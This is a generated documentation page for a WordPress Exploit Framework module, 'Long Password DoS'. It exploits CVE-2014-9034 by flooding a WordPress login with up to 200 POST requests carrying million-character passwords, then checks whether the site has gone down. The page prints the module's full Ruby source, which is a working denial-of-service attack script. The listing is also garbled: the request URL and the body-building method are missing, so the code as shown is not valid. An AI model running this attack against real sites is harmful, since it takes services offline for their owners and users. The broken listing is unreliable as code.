Class: Wpxf::Auxiliary::LongPasswordDos

Inherits:
Module
  • Object
Includes:
Wpxf, Net::HttpClient, WordPress::Login, WordPress::User
Defined in:
lib/wpxf/modules/auxiliary/dos/long_password_dos.rb

Constant Summary

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::User

#wordpress_user_exists?, #wordpress_user_profile_form_fields

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ LongPasswordDos

Returns a new instance of LongPasswordDos.



# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 9

# Builds the module: passes its metadata to update_info and then passes its
# five configurable options to register_options.
#
# The description string names the affected WordPress ranges and the release
# that ends each range (3.7.5, 3.8.5, 3.9.3, 4.0.1); the references point at
# CVE-2014-9034.
def initialize
  super

  summary = [
    'WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, ',
    'and 4.x before 4.0.1 allows remote attackers to cause a denial ',
    'of service via a long password that is improperly handled during ',
    'hashing.'
  ].join

  # First two entries: vulnerability disclosure. Last entry: WPXF module.
  credits = ['Javier Nieto Arevalo', 'Andres Rojas Guerrero', 'rastating']

  advisories = [
    ['CVE', '2014-9034'],
    ['WPVDB', '7681'],
    ['URL', 'http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034']
  ]

  update_info(
    name: 'Long Password DoS',
    desc: summary,
    author: credits,
    references: advisories,
    date: 'Nov 20 2014'
  )

  # Options are constructed in the same order the module has always
  # registered them: request sizing first, then timeout, then the account.
  length_opt = IntegerOption.new(
    name: 'pass_length',
    required: true,
    desc: 'Length of the password to use',
    default: 1_000_000
  )
  count_opt = IntegerOption.new(
    name: 'max_requests',
    required: true,
    desc: 'Max number of requests to send',
    default: 200
  )
  timeout_opt = IntegerOption.new(
    name: 'http_client_timeout',
    desc: 'Max wait time in seconds for HTTP responses',
    default: 5,
    required: true
  )
  user_opt = StringOption.new(
    name: 'username',
    desc: 'The username to attempt to login with',
    required: true,
    default: ''
  )
  validate_opt = BooleanOption.new(
    name: 'validate_user',
    desc: 'Validate the specified username',
    required: true,
    default: true
  )

  register_options([length_opt, count_opt, timeout_opt, user_opt, validate_opt])
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 81

# Classifies the target by comparing the version reported by
# wordpress_version against the affected ranges.
#
# Each range is half-open: the lower bound is included and the upper bound
# (the release named as fixed in the module description) is excluded.
#
# NOTE(review): the result rests on the version comparison alone; no other
# call is made here. A site carrying a backported fix, or one reporting an
# altered version string, would presumably be misclassified — confirm how
# wordpress_version derives its value.
#
# @return [Symbol] :unknown when no version is available, :vulnerable when
#   the version falls inside a range, :safe otherwise
def check
  detected = wordpress_version

  affected = [
    %w[0 3.7.5],
    %w[3.8 3.8.5],
    %w[3.9 3.9.3],
    %w[4.0 4.0.1]
  ].map { |floor, fixed| [Gem::Version.new(floor), Gem::Version.new(fixed)] }

  return :unknown if detected.nil?

  in_range = affected.any? { |floor, fixed| detected >= floor && detected < fixed }
  in_range ? :vulnerable : :safe
end

#max_requests ⇒ Object



# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 73

# Reads the 'max_requests' option through normalized_option_value.
#
# @return the normalized option value (registered as an IntegerOption, so
#   presumably an Integer — confirm against normalized_option_value)
def max_requests
  option_key = 'max_requests'
  normalized_option_value(option_key)
end

#pass_length ⇒ Object



# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 77

# Reads the 'pass_length' option through normalized_option_value.
#
# @return the normalized option value (registered as an IntegerOption, so
#   presumably an Integer — confirm against normalized_option_value)
def pass_length
  option_key = 'pass_length'
  normalized_option_value(option_key)
end

#run ⇒ Object



# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 101

# Executes the module against the configured target.
#
# Steps visible here: defer to super, optionally confirm the username
# exists, build one request description (a POST whose password comes from
# Wpxf::Utility::Text.rand_alpha(pass_length)), queue it max_requests times,
# execute the queue, then call wordpress_and_online? to decide the outcome.
#
# @return [Boolean, nil] false if super returns a falsy value or the target
#   still passes wordpress_and_online? afterwards; true if it does not; nil
#   when the username check fails (bare `return` below)
def run
  return false unless super

  if should_validate_user?
    emit_info "Checking if user \"#{username}\" exists..."
    unless wordpress_user_exists?(username)
      emit_error 'The specified user does not exist, aborting operation.'
      # NOTE(review): bare `return` yields nil, while every other exit path
      # returns true or false; a caller comparing against false sees a
      # different value for this failure.
      return
    end
  end

  emit_info "Generating payload..."
  pass = Wpxf::Utility::Text.rand_alpha(pass_length)
  # NOTE(review): in this rendered listing the value after `url:` and the
  # method name before `(username, pass)` are missing, so the hash below is
  # not valid Ruby as shown. Compare with the file named in the header
  # comment before relying on this listing.
  opts = {
    url: ,
    method: :post,
    body: (username, pass)
  }

  emit_info "Preparing #{max_requests} requests..."
  complete_requests = 0
  # The same opts hash is queued max_requests times; nothing is sent until
  # execute_queued_requests is called below.
  max_requests.times do
    # The response (res) is not inspected; the callback only counts
    # completions and reports every tenth one.
    queue_request(opts) do |res|
      complete_requests += 1
      emit_warning("#{complete_requests} requests executed") if complete_requests % 10 == 0
    end
  end

  emit_info "Beginning execution of #{max_requests} requests over #{max_http_concurrency} threads"
  execute_queued_requests
  emit_success 'Finished executing requests'

  # The outcome rests on a single wordpress_and_online? call made after the
  # queue has been executed.
  # NOTE(review): presumably a slow but still-running site and an
  # unreachable one are not told apart here — confirm against
  # WordPress::Fingerprint.
  if wordpress_and_online?
    emit_error "FAILED: #{full_uri} appears to still be online"
    return false
  else
    emit_success "#{full_uri} appears to be down"
    return true
  end
end

#should_validate_user? ⇒ Boolean

Returns:

  • (Boolean)


# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 65

# Reads the 'validate_user' option through normalized_option_value.
#
# @return [Boolean] the normalized option value (registered as a
#   BooleanOption with a default of true)
def should_validate_user?
  option_key = 'validate_user'
  normalized_option_value(option_key)
end

#username ⇒ Object



# File 'lib/wpxf/modules/auxiliary/dos/long_password_dos.rb', line 69

# Reads the 'username' option through normalized_option_value.
#
# @return the normalized option value (registered as a StringOption with an
#   empty-string default, so presumably a String — confirm against
#   normalized_option_value)
def username
  option_key = 'username'
  normalized_option_value(option_key)
end